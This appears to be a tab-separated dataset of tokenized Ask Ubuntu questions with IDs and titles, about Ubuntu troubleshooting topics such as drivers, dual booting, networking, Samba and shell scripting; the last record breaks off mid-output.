471097	how do i write a script to output an html file ?	what am i doing wrong in this script ? # ! /bin/bash cat > /tmp/flash-viewer.htm < < - _eof_ < html > < head > < title > flash viewer < /title > < /head > < body > < object width=\ '' 1280\ '' height=\ '' 720\ '' data=\ '' $ 1\ '' > < /object > < /body > < /html > _eof_ if [ -n $ browser ] ; then $ browser '/tmp/flash-viewer.htm' elif which xdg-open > /dev/null ; then xdg-open '/tmp/flash-viewer.htm' elif which gnome-open > /dev/null ; then gnome-open '/tmp/flash-viewer.htm' else echo `` could not detect the web browser to use . '' fi the script gives these errors : joe @ u13 : ~/script $ ./html-flash-viewer.sh `` /home/joe/video.swf '' /tmp/flash-viewer.htm : line 1 : < html > < head > < title > flash : command not found /tmp/flash-viewer.htm : line 2 : < object : command not found /tmp/flash-viewer.htm : line 3 : < /body > < /html > : no such file or directory is there some kind of escape sequence i 'm missing ? i 've already tried using \ to escape the lt/gt brackets and enclosing the html in single and double quotes . each produces similar errors .
471100	how may i motion trigger a usb-webcam ?	is there a software i could use for this ? currently i 'm using guvcview but it does n't have the functionality afaik .
471102	ubuntu server to project	hej i am making a project to my exam this summer . it 's about finding the best server solution for a company with 400 employees in two sites one in aarhus and one in copenhagen and growing . the server shall include web server , backup server and file share server . all employees should have access to these options but there will only be two server admins controlling it . so my problem is that i ca n't find info about how big your market part is on the market , is the price still zero for a company and what is your advantages and disadvantages compared to mac and windows ? hope you will help me get closer to an answer for my project best regards jakob nă¸rholm
471103	overscan fixed : but only temporarily . need assistance with nvidia x server settings dialogue	i have troubles getting ubuntu 14.04 lts to display properly on my hdtv . my problem is that when i log out or shut down , ubuntu switches screen resolution from 1920x1080 to `` auto '' and forgets my underscan setting . everytime i reboot i need to reset nvidia x server settings . i 've tried saving my settings every possible way but ubuntu keeps on forgetting my resolution and underscan settings . how can i resolve this problem ?
471104	wine discard alsamixer settings , uses screen as speakers	as i run programs in wine-1.6.2 my screen speakers will be used as default . the default , as changed via alsamixer , is to disable the screen speakers and allow all other sound to flow freely ( automute : disabled ) . i have no idea of why this happen and it 's not a problem that happen every time ; most of the time it 's fine but recently it has occurred every time . i run ubuntu 14.04 64-bit . i have no special sound drivers installed . i do n't really know how to troubleshoot this issue so i do n't have any further information . thanks . sincerely , viktor wahlberg .
471111	unable to browse the web - ubuntu 14.04	i have this problem on ubuntu 14.04 lts : whenever i open a new chromium - chrome - firefox - opera window to reach any website , it 'll only show a `` please update internet explorer '' page - which i 'm not using , being on ubuntu . so how can i fix this ? thanks in advance !
471114	updated chrome , now pipelight not working	on my pc that i only use to stream amazon instant video . i have pipelight that up to now has been running fine i 'm using ubuntu 12.04 , with chrome as my browser and the user-agent switcher set up for firefox 15/windows . today i did a software update and foolishly let chrome update as well , not instant video is tell me to install silverlight . my question is , how to i sort this out so that pipelight does what it 's meant to again and let me stream videos off of amazon .
471116	dual boot install trouble : ubuntu only sees one huge unallocated partition	let me preface this by saying that i have no linux experience at all ; i really want to learn , but this is my first exposure . trying to dual boot ubuntu 14.04 on my asus k55a laptop . the laptop came preinstalled with windows 8 . i did a clean install of win7 . this install was in legacy bios , not uefi . i tried to install ubuntu 12.04 off a flash drive but the installation did not detect an existing os , just one huge unallocated partition . when i checked the flash drive from the bios settings it was identified a uefi drive . i assumed that the trouble i was having was because win7 was a legacy bios install and ubuntu was trying to install as uefi . i tried to start from scratch . i made a uefi win7 flash drive , installed from that . tried to install ubuntu 14.04 from a uefi flash drive , encountered the same problem . i did some searching and found a thread with a similar problem on the ubuntu forums with the following instructions for making the windows system visible : open terminal and type the following : sudo dd if=/dev/sda of=sda.mbr bs=512 count=1 to clear the gpt signatures you 'll need gdisk by typing : sudo apt-get install gdisk sudo gdisk /dev/sda switch to expert mode : x to `` zap '' gpt enter : z the selection for the first question y and answer n for mbr ! ! i followed these instructions and i think it erased my win7 install/partition , because if the ubuntu flash drive was n't in when i tried to boot up it would only boot into the bios menu . it gave me some warning about `` no bootable device . '' 1 ) what is the problem with ubuntu not recognizing the existing os ? 2 ) did i erase my win7 installation/partition when i followed those instructions above ? 3 ) can i resolve this issue if i 've already reinstalled win7 , or will it require starting from scratch ? 4 ) how do i fix this ?
471119	ext4 switching to read only mode	i have very frustrating problem . my server randomly switches / mount to read only without any pattern . only message that i 've found in logs is : htree_dirblock_to_tree:920 : inode # 14286877 : block 57155636 : comm rsync : bad entry in directory : rec_len % 4 ! = 0 i 've changed new hard disk , new controller , done memtest . last thing that is left to replace is motherboard , but this does n't make any sense . any advice ?
471123	how can i list folder contents in samba share ?	i managed to navigate inside a samba share using smbclient inside a terminal . now i need to save the list of contents of a directory to a local file . how can i do this ?
471126	how to add mass file extensions ?	i am trying to setup my xbmc music and used a program called puddletag to organize all the filenames and id3 tags . the problem is puddletag erased all the file extensions and now xbmc wo n't recognize the files as music . i need to add .mp3 to all 1000 of my music files . i realize i can simply rename them with the extension included but i did n't know if there was a way through ubuntu or puddletag ( if someone is familiar ) to do this to all selected files .
471128	`` the make utility was not found '' - error when installing virtualbox guest additions on lubuntu from the cd	i installed lubuntu as a guest os in virtualbox , and i tried installing the guest additions as i would in windows , from `` devices- > insert guest additions cd image ... ( host+d ) '' , and then running the autorun.sh file . this failed , however , with these errors : the make utility was not found . if the following module compilation fails then this could be the reason and you should try installing it . the gcc utility was not found . if the following module compilation fails then this could be the reason and you should try installing it . building the main guest additions module ... fail !
471130	after deleting the efi menu entry for windows , i always have a system error and ca n't shut down properly	xubuntu 14.04 hi , first some code bits which i think are relevant : $ sudo efibootmgr bootcurrent : 0000 timeout : 3 seconds bootorder : 0000,0003,0004 boot0000* ubuntu boot0003* hard drive boot0004* cd/dvd drive $ sudo lsblk name maj : min rm size ro type mountpoint sda 8:0 0 931,5g 0 disk ├─sda1 8:1 0 128m 0 part ├─sda2 8:2 0 157,7g 0 part ├─sda3 8:3 0 586,3g 0 part ├─sda4 8:4 0 30g 0 part / ├─sda5 8:5 0 157,3g 0 part /home └─sda6 8:6 0 100m 0 part /boot/efi sr0 11:0 1 1024m 0 rom $ sudo blkid /dev/sda2 : uuid= '' c8c8dae9c8dad4b2 '' type= '' ntfs '' /dev/sda3 : label= '' data '' uuid= '' 9ae4bbdee4bbbb39 '' type= '' ntfs '' /dev/sda4 : uuid= '' 6ff82639-0387-4fe0-a9ea-d3d58b94358f '' type= '' ext4 '' /dev/sda5 : uuid= '' 6e6e2000-fa00-4eda-a1eb-07f1b3fdd9e0 '' type= '' ext4 '' /dev/sda6 : uuid= '' b0cd-a57e '' type= '' vfat '' john @ xubuntubox : ~ $ whenever i enter grub and boot into my windows 7 installation , it adds itself to spot 0001 in the efi menu and apparently gets set as the default boot target . so i have to enter the efi settings on boot , select ubuntu for the grub menu and then can use xubuntu again . so far so good . after a new sudo efibootmgr i usually run sudo efibootmgr -b 0001 -b to remove the windows entry . after a short while ( ca n't say how long exactly ) , i always get a system error . ubuntu keeps functioning fine though . then when i choose to shut down via the xfce gui , the pc goes to the bootscreen , has the circle spinning and then the spinning suddenly stops . the fans are still running but the machine sounds like it 's off otherwise . how can i fix this ? however when i
471131	how to fix system settings window lag	i wanted to open system settings window and i waited ~30s . then the window was opened . my machine has an intel core i7 processor and 16gb ram . what produces a lag in opening system settings ? how can this be fixed ?
471133	pre-bundle software on my ubuntu usb boot stick	is it possible to pre-bundle software on an usb-boot stick so that it installs automatically when formatting the computer ? i have a computer that is going to be donated to the student communtity `` fysikkforeningen '' ( physics community ) at the university of oslo . i 'm installing ubuntu as the main os , and a bunch of programming tools and game emulators ( nintendo , playstation , gamecube etc ) . the computer is going to be available for anyone to use , and therefore i need to have a bootable usb to reformat the computer when it becomes slow and cluttered . making a bootable usb is no problem , but it would be nice to have the software automatically installed and set up . does anyone know how to make such an usb-stick ? would it be possible to install software directy to the usb , and have it `` burned '' to the hdd whenever i format ? the main purpose of this computer is to serve as an old-school gaming platform , not a homework station , we have other computers for that . but since we get matlab and other expencive tools for free , it would be nice put it on there , and not re-install everything manually whenever we need to format the computer . best regards , einar fysikkforeningen , university of oslo
471135	save all music files in a vlc xspf playlist to another folder	i have a vlc playlist ( .xspf ) of over a 100 songs all scattered all over my computer . i 'm looking for a way to save this playlist and all it 's songs to another folder - flash drive , external drive or just a different location in my computer . how can i do this ? edit the xspf playlist is in xml and is such a format : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < playlist xmlns= '' http : //xspf.org/ns/0/ '' xmlns : vlc= '' http : //www.videolan.org/vlc/playlist/ns/0/ '' version= '' 1 '' > < title > playlist < /title > < tracklist > < track > < location > file : ///home/subroot/music/3 % 20days % 20grace % 20- % 20wake % 20up.mp3 < /location > < title > wake up < /title > < creator > 3 days grace < /creator > < album > three days grace < /album > < tracknum > 10 < /tracknum > < annotation > < /annotation > < duration > 206036 < /duration > < extension application= '' http : //www.videolan.org/vlc/playlist/0 '' > < vlc : id > 0 < /vlc : id > < /extension > < /track > . . [ many more tracks here ] . < /tracklist > < extension application= '' http : //www.videolan.org/vlc/playlist/0 '' > < vlc : item tid= '' 0 '' / > . . [ other id 's here ] . < /extension > < /playlist >
471136	wired broadband connection not working with ubuntu 14.04 kylin	i tried a couple of times setting up a new dsl connection with the username and password but somehow the connection is not getting established . the ethernet card is working perfectly fine . i have to update the plugins for the new version of ubuntu for a couple of ide . please help asap .
471137	setting up vms on different subnets	i run a server on ip x.y.3.7 and i want to run multiple vms on it using libvirt . i set up a bridge device : auto eth0 iface eth0 inet manual auto br0 iface br0 inet static address x.y.3.7 broadcast x.y.3.31 netmask 255.255.255.224 gateway x.y.3.1 bridge_ports none bridge_ports eth0 ... everything works smoothly if use the first of my three additional ips : x.y.3.9 however , the other 2 are from a different subnet x.y.4.101 x.y.4.102 the bridged network approach does not seem to work with guest from different subnets ? what alternatives do i have ?
471138	reinstalled windows 7 starter , ubuntu not installing ?	so , i have this asus eee pc 1201ha , and i installed ubuntu 12.04 lts via wubi , but when i tried to factory reset my computer , an error came up the bootmgr was missing , or something . in the end i just formatted my hard drive and reinstalled windows 7 starter , but now that i tried to install ubuntu back via a bootable usb with unetbootin , i would restart my computer and choose to boot from the usb , but i would get the bootmgr is missing message again . i then tried to reinstall with wubi , but whenever i rebooted and chose ubuntu to try to finish the install , it would take me to some magicbox or somethingbox commandline and say something along the lines of losetup : no loop found any suggestions ?
471139	how to update my bios	i 've been having some boot problems with it so i have ubuntu and booted from the drive . i wanted to update my bios to fix this issue but i do n't have my product key so i looked up the website ( hp website that is ) and it could detect my product key so i tried it and it said that it only works for windows and underneath that , it said that i should install any of the following ( internet explorer , mozilla or chrome ) browsers and i thought that i could use wine to run ie 8 . so can i get another software to run windows things ? remember i am booting from usb .
471140	lock-screen to take a picture after incorrect password	is there a way to modify the lock screen to show a custom message and/or take a picture ( /w the webcam ) when incorrect password was typed in ? ( like it was shown in the movie goodbye world ) ( and does anyone know where are the files used by the lockscreen ? - i mean codes )
471154	how to import and install a uec image on openstack ?	getting started with openstack here . i 've successfully imported and launched instances with a cirros image per the openstack installation guide , but when i import uec images , like this one here and then attempt to launch instances from it , the instance console reports : booting from hard disk ... boot failed : not a bootable disk no bootable device . when importing the uec image , i 've tried specifying both raw and qcow2 formats to openstack , but get the same error . what am i missing here ?
471156	how to watch netflix in india on ubuntu13.10 ?	i have tried a lot of ways following google search but i could find a way . i want to watch us netflix in india using ubuntu os 13.10 .
471157	how to display reboot required user notification after installing a custom package in linux ?	after installing a custom package i should force a reboot of the system . i looked at couple of solutions to this use notify-send to display user notification followed by a reboot command , which did work as planned . but the user notification is only shown when i install the package from command line and not when i installed through software center . i came across some posts where they suggested adding the following to the postinst script [ -x /usr/share/update-notifier/notify-reboot-required ] & & \ /usr/share/update-notifier/notify-reboot-required || true tried including the above in the postinst script but all it does is updating the two files /var/run/reboot-required.pkgs and /var/run/reboot-required with restart information . it neither displayed user-notification nor rebooted the system after package is installed . is there a way to display reboot required user notification in ubuntu/fedora/open suse ?
471158	proper location to install services	in ubuntu or linux in general is there a `` correct '' location to install services that you download from the internet and want to run . i would like to have services such as redis or ventrilo auto run but to me it does n't make sense to put them in the ~/redis or ~/ventrilo directories since they are n't user specific . keep in mind that i 'm relatively new to the linux world having been a .net developer for about 4 years now .
471160	ut2003 installation problems ( the setup program seems to have failed on x86/unknown )	i 'm trying to install unreal tournament 2003 on my ubuntu 14.04 ( i have the cds as iso files ) and , i 've followed some different instructions on how to do it , but ran into this kind of problem : linux32 sh ./linux_installer.sh copying to a temporary location ... verifying archive integrity ... an embedded md5 sum of the archive exists but no md5sum program was found in /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games if you have md5sum on your system , you should try : env guess_md5_path= '' firstdirectory : seconddirectory : ... '' /tmp/makeself5187 -check all good . uncompressing unreal tournament 2003 for gnu/linux 2199 ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. .setup5210 : dynamic-link.h:57 : elf_get_dynamic_info : assertion ` ! `` bad dynamic tag '' ' failed . aborted ( core dumped ) the setup program seems to have failed on x86/unknown fatal error , no tech support email configured in this setup the program returned an error code ( 1 ) there seems to have been same kinds of problems before , but have n't found answers yet how to fix this : /
471167	compatible stand alone multi-touch display for ubuntu ?	i 'm looking for a multi-touch monitor solution that i can connect to a workstation running ubuntu 14.04 . does anyone know of a stand alone monitor i can use where touch actions would go over a usb connection like the dell touch monitors and windows 8 ? dell 's tech support said their touch monitors like the p2314 are not supported on linux http : //accessories.us.dell.com/sna/productdetail.aspx ? c=us & cs=19 & l=en & sku=859-bbbc i did come across system76 's sable touch but this does n't work for me as it is more like a tablet with a keyboard . i need the monitor to be separate from the pc . being able to connect two separate multi-touch monitors would n't hurt either . https : //system76.com/desktops/model/sabt2
471169	desktop icons not displayed	i installed kde for trying it in parallel with unity . then i removed kde but now no icons is displayed in the desktop and my system is exteremely slow . i tried running bleachbit as root to clean the mess but it is the same .
471173	why is gdb progfile producing a segmentation fault ?	i have a g++ project and would like to debug it using gdb . opening gdb with the program as an argument produces the following output : reading symbols from < my_app_name > ... segmentation fault ( core dumped ) compilation flags -c std=c++11 -g link flags -lssl -lcrypto -pthread -luuid -std=c++11-rdynamic my executable file size is 2,141,712 with debug informations present the 'top command ' reveals 3,417,168 free memory . $ g++ -- version g++ ( ubuntu 4.8.2-19ubuntu1 ) 4.8.2 $ gdb -- version gnu gdb ( ubuntu 7.7-0ubuntu3.1 ) 7.7 ... i also tried the verbose option , but somehow it does not seem to work anymore ? man gdb cant find the verbose option .
471175	stuck with unity 2d despite having nvidia 630m installed ( but possibly not running )	i have a hp dv6 with the following specs : 6 gb ram intel® core™ i5-2450m cpu @ 2.50ghz × 4 64 bit vesa : intel® sandybridge/ivybridge graphics nvidia geforce gt 630m ( 2 gb ) note : i have been struggling with these problems for about a week , so please do n't post links to other [ solved ] questions , because i 've tried everything i have been able to find , and gotten nowhere . i have installed/uninstalled nvidia drivers so many times , that i do n't know whether they are working or not . my guess is that they are not . jockey says nvidia is installed , but not in use . i am always in unity-2d mode , and ca n't get the system to switch to 3d . have no clue what 's going on . i do n't want to play crysis on ubuntu , i just want a decent unity 3d desktop . is it too much to ask for ? what kind of spells/blood-magic are involved to achieve this ? edits : sudo lshw -c display : *-display unclaimed description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list configuration : latency=0 resources : memory : d4000000-d43fffff memory : c0000000-cfffffff ioport:5000 ( size=64 ) dpkg -l | grep nvidia : ii nvidia-304 304.116-0ubuntu0.0.1 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-331-updates 331.38-0ubuntu0.0.1 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-current 304.116-0ubuntu0.0.1 transitional package for nvidia-current ii nvidia-settings 331.20-0ubuntu0.0.1 tool for configuring the nvidia graphics driver
471178	converting hundreds of jpg to pdf using terminal	i know that the command convert *.jpg mypdf1.pdf can convert multiple jpeg files into a single pdf . but i would like to convert multiple jpegs into multiple pdfs , for example : myjpg1.jpg → mypdf1.pdf myjpg2.jpg → mypdf2.pdf myjpg3.jpg → mypdf3.pdf is there any decent way to manage something like that ?
471179	can not use nvidia drivers	im using ubuntu 14.04 . i installed bumblebee on my laptop uses nvidia geforce . i uninstalled bumblebee and installed nvidias official drivers but computer is still trying to use bumblebee with intel ivybridge mobile . it is written on `` about this computer '' section too . how can i switch graphic card to nvidia ?
471181	blank screen after suspend/hibernate on 14.04	i did a fresh install of ubuntu 14.04 . everything works great except after hibernate/suspend i am getting a black screen . i can use alt+ctr+f1 then ctrl+alt+del to restart and the screen comes back fine . i am using the open-source x.org x-server drivers . my laptop is hp pavilion g6 , apu a8-3520m with radeon hd 6620g what can i do to make screen come back after suspend/hibernation ? i 've checked some old thread from 2010 where people add a little piece of code to somewhere in the system to force the screen come back or something . i will be really grateful for your help : ) thanks in advance
471183	getting hdtracks music download application working under wine in ubuntu 14.04 64bit	good people : does anyone here buy music from hdtracks , using ubuntu 14.04 64bit ? in 13.10 32 bit i used to be able to buy music using their windows application under wine , but now when i try , i can not log in through the application to their site - the application tells me that `` there was a problem logging in '' and to try again later . i have tried running in a 32bit winearch to no avail .
471186	cant find ubuntu tweak on ubuntu 14.04	yes i installed ubuntu tweak on ubuntu 14.04 and i can only run it by going to the terminal and typing ubuntu-tweak theirs no icon in the drop down menu cause i installed gnome flash back so i am just trying to get a launcher icon some where in the launcher and its not in system setting either
471187	problem with restarting apache2 on ubuntu server 14.04	i have a problem when i 'm trying to restart apache2 on my ubuntu server 14.04 . i 'm getting this error : restarting web server apache2 [ fri may 23 18:50:56.662042 2014 ] [ alias : warn ] [ pid 8635 ] ah00671 : the alias directive in /etc/apache2/conf-enabled/phpmyadmin.conf at line 3 will probably never match because it overlaps an earlier alias . ( 98 ) address already in use : ah00072 : make_sock : could not bind to address [ : : ] :80 ( 98 ) address already in use : ah00072 : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down ah00015 : unable to open logs action 'start ' failed . the apache error log may have more information . [ fail ] the apache2 instance did not start within 20 seconds . please read the log files to discover problems can somebody help me to fix this error ? thanks in advance .
471189	unable to connect to amazon ec2 from home using samba	please note i have already asked this question over on ubuntu forums but it 's not gaining any traction . i am trying to connect my laptop running ubuntu 14.04 to a samba share on ec2 instance running ubuntu 13.10 . things i have tried : set inbound rules on ec2 to `` all traffic '' for my home and work ip addresses . connecting to samba share from work pc running windows 7 - works fine . connecting to samba share from work wifi on my laptop - works fine . ssh into ec2 instance from laptop at home - works fine , eliminating security group issues . connecting to samba share from home wifi on my laptop - does not work ! desired action : type smb : // < public-dns > /myshare into the dash ( by pressing super ) ... result at home : error thrown `` unhandled error message : failed to mount windows share . connection timed out '' . result at work : '' myshare '' directory opens . update ran the following commands on my ubuntu laptop at work , then at home . nmap -p 139 nmap -p 445 sudo nmap -su -p 137 sudo nmap -su -p 138 result at work all `` open '' result at home all `` filtered '' except udp 138 which is `` open|filtered '' lastly ... checked over my router settings again , and set up the laptop as dmz which also did not work . beginning to think it must just be the isp . update 2 reset router to factory settings . did not help
471191	i want to change my ubuntu 14.04 32bits to 64 bits	what could i do without download ubuntu 14.04 64 bits .iso.. i installed ubuntu 14.04 32 bits since 13.10 and i-m interested on upgrade to 64 bits but i don-t know how to do it without to reinstall os , if someone know how do it of other manner i-m waiting yours answer.. thanks
471197	alcatel one touch not found in adb	i 'm trying to connect my alcatel one touch to my pc over usb for use with android studio . adb usb outputs error : device not found adb devices does n't output any device name : list of devices attached ( blank line ) my phone does show up with lsusb though ( 2nd line ) bus 002 device 003 : id 046d : c531 logitech , inc bus 002 device 011 : id 1bbb:9017 t & a mobile phones bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 0bda:0139 realtek semiconductor corp. rts5139 card reader controller bus 001 device 004 : id 13d3:5710 imc networks uvc vga webcam bus 001 device 006 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i 've already tried to adb kill-server and adb start-server
471201	how to enable mnemonics in 12.04 and/or 14.04 gtk3 ?	word on the street is that `` gtk-enable-mnemonics '' has been deprecated since version 3.10 , and i am not at all sure how to get my application to display mnemonics . they will only display if i press the alt key . please see here : http : //stackoverflow.com/questions/23049406/wxpython-button-shortcut-accelerator-how-to-spam i have tried everything suggested in this article in regards to settings.ini , switching the bool to the opposite : how do i disable mnemonics in gtk3 ? related : https : //developer.gnome.org/gtk3/3.2/gtksettings.html
471204	ubuntu 12.04.4 lts adobe flash player	i have adobe flash player installed on ubuntu 12.04.4 lts 32-bit but there seems to be a few instances of the same player especially in google chrome . when i check through chrome : //plugins/ i saw two entries and after i uninstalled by invoking the following commands : sudo apt-get remove adobe-flashplugin sudo apt-get remove adobe-flash sudo apt-get remove flashplugin-installer sudo dpkg -- purge flashplugin-installer sudo apt-get remove -- purge ubuntu-restricted-extras adobe-flashplugin flashplugin-installer i still got an entry in chrome : //plugins/ that can be identified in the following screenshot . i would like to remove all instances of flash player and perform a clean reinstall , can you provide help on this issue ? thanks in advance
471205	how do i install chemtool ?	i 've downloaded the chemtool-1.6.14.tar.gz from http : //ruby.chemie.uni-freiburg.de/~martin/chemtool/chemtool-1.6.14.tar.gz , then i extracted its contents into the directory : /home/fusion809/downloads/chemtool-1.6.14 then i opened terminal , cd'ed to this directory ran ./configure ( with no errors ) , then ran make from the terminal and received this output : make all-recursive make [ 1 ] : entering directory `/home/fusion809/downloads/chemtool-1.6.14' making all in m4 make [ 2 ] : entering directory `/home/fusion809/downloads/chemtool-1.6.14/m4' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/fusion809/downloads/chemtool-1.6.14/m4' making all in po make [ 2 ] : entering directory `/home/fusion809/downloads/chemtool-1.6.14/po' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/fusion809/downloads/chemtool-1.6.14/po' making all in src-cht make [ 2 ] : entering directory `/home/fusion809/downloads/chemtool-1.6.14/src-cht' gcc -g -o2 cht.c -o cht make [ 2 ] : leaving directory `/home/fusion809/downloads/chemtool-1.6.14/src-cht' make [ 2 ] : entering directory `/home/fusion809/downloads/chemtool-1.6.14' gcc -dlocaledir=\ '' /usr/local/share/locale\ '' -dhave_config_h -i . -i . -i . -g -o2 -c main.c main.c:18:22 : fatal error : gdk/gdkx.h : no such file or directory # include < gdk/gdkx.h > ^ compilation terminated . make [ 2 ] : *** [ main.o ] error 1 make [ 2 ] : leaving directory `/home/fusion809/downloads/chemtool-1.6.14' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/fusion809/downloads/chemtool-1.6.14' make : *** [ all ] error 2 how do i get past this ? please remember i am a total noob when it comes to coding so in-depth explanations will be required , thank you .
471207	brightness control does not work in ubuntu 14:04	i have a `` inspirion 15r se 7520 '' and the brightness control does n't work . using amd driver , i have already added : grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' to the grub config file but with this line , my ubuntu does n't start . what i have to do ? using amd radeon hd7700m series and my notebook have hybrid graphics .
471208	realtek wireless adapter issues . ( rtl8192ce and rtl8192cu )	i have been having significant issues with the usability/reliability of my wireless cards . i have tried several fixes over the past few days . i am running ubuntu 14.04 lts . i go from 1/10 of the speed i should be getting to not working at all . it does drop sometimes as well . ( the above is in regards to my pci rtl8192ce card ) i recently tried to install a usb wifi adapter ( rtl8192cu ) and i can not even get that one to connect well enough to use . ( basically shows no `` bars '' on the wireless icon on the top right ) i have tried to install the realtek drivers from the realtek site but i had a couple errors with the install . ( i have the output somewhere if it is needed . ) i have tried as well to use the fix found here : https : //sites.google.com/site/easylinuxtipsproject/reserve-7 to no avail . i would appreciate your assistance in fixing this . ( there may be a question already solving this but i have tried 2-4 fixes over the past 2 days and none worked )
471209	qemu nfs client can not mount exported file system	i have setup a nfs server on ubuntu 14.04 and can successfully mount its exported file system from another `` real '' machine , but mounting that same file system from a qemu instances fails with the error : # lsb_release -d description : ubuntu 14.04 lts # mount -av -t nfs mount.nfs : trying text-based options 'bg , vers=4 , addr=192.168.5.5 , clientaddr=192.168.5.23' mount.nfs : mount ( 2 ) : no such device mount.nfs : no such device both the nfs server and qemu instance are hosted on the same machine . networking for the emulator is via bridge mode with a tap device . the qemu instance has nfs-common installed , and the server 's export looks like : # showmount -e 192.168.5.5 export list for 192.168.5.5 : /svf 192.168.5.1/24 from the qemu instance . any ideas what else i should check ?
471212	wireless network continously disconnects	i have pavilion g6 with ubuntu 12.04 installed , my wireless networks keeps on disconnecting and then takes a long time to connect can someone suggest a possible solution for this problem ? here are the output of some commands that might be useful to solve the problem lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] ( rev ff ) 07:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie 07:00.1 bluetooth : ralink corp. rt3290 bluetooth 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) lsmod vboxpci 23236 0 vboxnetadp 25670 0 vboxnetflt 27612 0 vboxdrv 320274 3 vboxpci , vboxnetadp , vboxnetflt binfmt_misc 17508 1 pci_stub 12622 1 coretemp 17728 0 nvram 14462 0 bnep 23966 2 rfcomm 74658 0 bluetooth 391597 10 bnep , rfcomm parport_pc 32866 0 ppdev 17711 0 snd_hda_codec_hdmi 41684 1 snd_hda_codec_idt 55098 1 uvcvideo 82247 0 snd_hda_intel 57183 3 snd_hda_codec 194881 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel arc4 12573 2 videobuf2_core 40903 1 uvcvideo snd_hwdep 13613 1 snd_hda_codec snd_pcm 107140 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec videodev 139144 2 uvcvideo , videobuf2_core videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc snd_seq_midi 13324 0 snd_rawmidi 30465 1 snd_seq_midi rt2800pci 18966 0 rt2x00mmio 13661 1 rt2800pci radeon 1540281 0 rt2800lib 95449 1 rt2800pci snd_seq_midi_event 14899 1 snd_seq_midi crc_ccitt 12707 1 rt2800lib rt2x00pci 13287 1 rt2800pci ttm 84699 1 radeon rt2x00lib 56053 4 rt2800pci , rt2x00mmio , rt2800lib , rt2x00pci i915 733900 3 snd_seq 66061 2 snd_seq_midi , snd_seq_midi_event snd_timer 30038 2 snd_pcm , snd_seq hp_wmi 18202 0 joydev 17575 0 snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq mac80211 634700 3 rt2800lib , rt2x00pci , rt2x00lib sparse_keymap 13890 1 hp_wmi cfg80211 504229 2 rt2x00lib , mac80211 drm_kms_helper 53165 2 radeon , i915 drm 303133 6 radeon , ttm , i915 , drm_kms_helper mei_me 18418 0 snd 73802 17 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_se q_midi , snd_rawmidi , snd_seq , snd_timer , snd_seq_device psmouse 104113 0 mei 78609 1 mei_me soundcore 12680 1 snd snd_page_alloc 18798 2 snd_hda_intel , snd_pcm rtsx_pci_ms 18320 0 memstick 16762 1 rtsx_pci_ms hp_accel 26012 0 wmi 19363 1 hp_wmi i2c_algo_bit 13564 2 radeon , i915 serio_raw 13462 0 video 19574 1 i915 eeprom_93cx6 13344 1 rt2800pci lis3lv02d 20280 1 hp_accel input_polldev 13896 1 lis3lv02d mac_hid 13253 0 lpc_ich 21163 0 lp 17799 0 parport 42481 3 parport_pc , ppdev , lp rtsx_pci_sdmmc 23920 0 ahci 30063 2 libahci 32088 1 ahci rtsx_pci 46133 2 rtsx_pci_ms , rtsx_pci_sdmmc r8169 73111 0 mii 13981 1 r8169 sudo lshw -c network *-network description : wireless interface product : rt3290 wireless 802.11n 1t/1r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : wlan0 version : 00 serial : a4:17:31:43 : c1:61 width : 32 bits clock : 33mhz capabilities : pm 